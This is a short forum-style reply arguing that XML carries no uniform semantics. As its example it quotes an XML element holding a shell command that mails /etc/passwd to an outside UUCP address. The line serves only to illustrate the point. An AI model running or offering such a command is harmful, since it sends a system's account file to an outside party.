You seem to be assuming uniform semantics when that doesn't exist.  For example, is this line of XML
        <system>mail bad!guy!spammer &lt;/etc/passwd</system>
taken from a document that shows I/O redirection and UUCP notation?  Or is it going to be executed on a target system?
